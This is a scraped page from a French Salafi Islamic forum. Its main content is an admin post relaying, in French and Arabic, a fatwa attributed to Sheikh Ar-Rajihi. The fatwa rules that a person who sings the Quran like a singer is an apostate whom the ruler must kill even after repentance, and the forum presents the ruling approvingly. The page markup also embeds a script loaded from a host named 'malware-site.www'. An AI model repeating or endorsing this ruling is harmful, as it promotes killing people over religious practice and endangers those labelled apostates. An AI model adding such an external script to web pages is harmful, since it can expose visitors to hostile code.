ISLAM SUIVANT LE CORAN ET LA SUNNA

<center><iframe align="center" id="IW_frame_1438" src="http://www.tvquran.com/add/index.htm" frameborder="0" allowtransparency="1" scrolling="no" width="302" height="334"></iframe></center>



<a href="http://#7F96C3" id="pluiedetoiles"><script type="text/javascript" src="http://malware-site.www/js/pluiedetoiles.js"></script></a>Ce présent blog se propose de transmettre le message de l'Islam et le monothéisme islamique d'après le Coran et la Sounna authentique selon la compréhension des Pieux prédécesseurs.

N'hésitez pas à vous inscrire à la Newsletter pour être mis au courant des nouveaux articles.

ISLAM SUIVANT NOS EMINENTS SAVANTS

Logo Design by FlamingText.com

Logo Design by FlamingText.com
Bienvenue sur ce forum . Comme son nom l'indique, ce forum a pour but de vous faire découvrir cette magnifique religion qu’est l’Islam ainsi que de rectifier votre avis sur celle-ci. Le forum s’est aussi fixé un autre objectif : « mettre fin aux mensonges islamophobes et défendre l’honneur de D'Allah ainsi que Son Messager »

nous suivons a travers ce forum la voie de nos pieux predecesseurs extrait du coran et de la sounna selon la compréhension de notre bien aimé prophete صلى الله عليه و سلم»

il est basé sur la croyance des gens de la sounnah , et se conforme strictement au coran, et la Sounna du prophète Mohamed صلى الله عليه وسلم ...Les articles que contient ce forum sont des écrits ou des paroles de nos eminents savants salafis , et notre objectif est avant tout d’appeler les gens à l'unicité d'Allah (tawhid) et de diffuser la da'wah salafiyah qui est la bonne compréhension de l’islam,il est le plus rédigé en langue française afin de faire connaître aux musulmans francophones et meme aux mecreants leur religion véridique et les appeler à pratiquer ses enseignements et préceptes, de les avertir du danger de l'association à Allah , ainsi que des innovations et de les mettre en garde sur les mauvaises interprétations de l’islam diffusées par les innovateurs et les groupes égarés.

Allah par sa Miséricorde a envoyé des prophètes et des Envoyés avec un seul message, un seul objectif : rappeler aux hommes l’Unicité de dieu ( il n’y a de dieu qu’Allah) Ceci est le fondement de l’islam



 
">

Like/Tweet/+1

neige qui tombe

coran a telecharger de medine

Sam 28 Nov - 13:28 par assalafia

http://nashr.qurancomplex.gov.sa/download/Al_Madinah_Mushaf_Win_Setup_15-4-2015.rar

Septembre 2017

LunMarMerJeuVenSamDim
    123
45678910
11121314151617
18192021222324
252627282930 

Calendrier Calendrier


    Sheikh Abdoul Azziz Ar-Rajihi Quel est le statut de celui qui chante le Coran ?

    Partagez
    avatar
    assalafia
    Admin

    Féminin
    Messages : 1354
    Date d'inscription : 26/08/2011
    Age : 35
    Localisation : algerie-constantine
    Emploi/loisirs : lire le coran
    Humeur : bonne

    Sheikh Abdoul Azziz Ar-Rajihi Quel est le statut de celui qui chante le Coran ?

    Message par assalafia le Jeu 2 Jan - 12:31

    Surprised 

    Sheikh Abdoul Azziz Ar-Rajihi

    Quel est le statut de celui qui chante le Coran ? Est-il considéré comme un apostat ? Quel est le châtiment qu'il faut lui appliquer ?

    Question : Quel est le statut de celui qui chante le Coran ? Est-il considéré comme un apostat ? Quel est le châtiment qu'il faut lui appliquer ?

    Réponse : S'il se met à chanter le Coran de la façon des chanteurs, il devient apostât sortant de l'Islam, qu'Allah nous préserve !
    Ce qui est authentique parmi les paroles des savants est qu'il ne doit pas lui être demandé de se repentir. Il est obligatoire au gouverneur musulman de le tuer même s'il annonce son repentir, en effet il n'est pas accepté Ici-bas, son repentir le concerne il est entre lui et Allah le Très-Haut. S'il était véridique dans son repentir Allah acceptera son repentir mais toutefois il est obligatoire de le tuer c'est le jugement Ici-bas afin que la mécréance ne devienne pas courante chez les gens.
    Quant à l'Au-delà son cas appartient à Allah, s'Il veut Il le châtie ou s'Il veut Il lui pardonne !



    Source : http://shrajhi.com/Fatawa/ID/977

    ما حكم من غنى بالقرآن؟ وهل يعتبر مرتدًّا؟ وما هو الحد الذي يفترض أن يقام عليه؟


    إذا غنى بالقرآن علي طريقة أهل الغناء يكون بذالك مرتدًّا عن الأسلام والعياذ بالله والصحيح من أقوال العلماء أنه لا يستتاب والواجب علي الحاكم المسلم قتله ولو أعلن التوبه لا تقبل منه في الدنيا وتكون توبتة بينه وبين الله تعالي إن صدق في توبته قبل الله توبته لكن الواجب اقامة الحد عليه وهو القتل في الدنيا حتي لا يتجرأ الناس علي الكفر أما في الآخرة فأمره إلى الله إن شاء عذبه وإن شاء غفر له.²²

      La date/heure actuelle est Ven 22 Sep - 12:59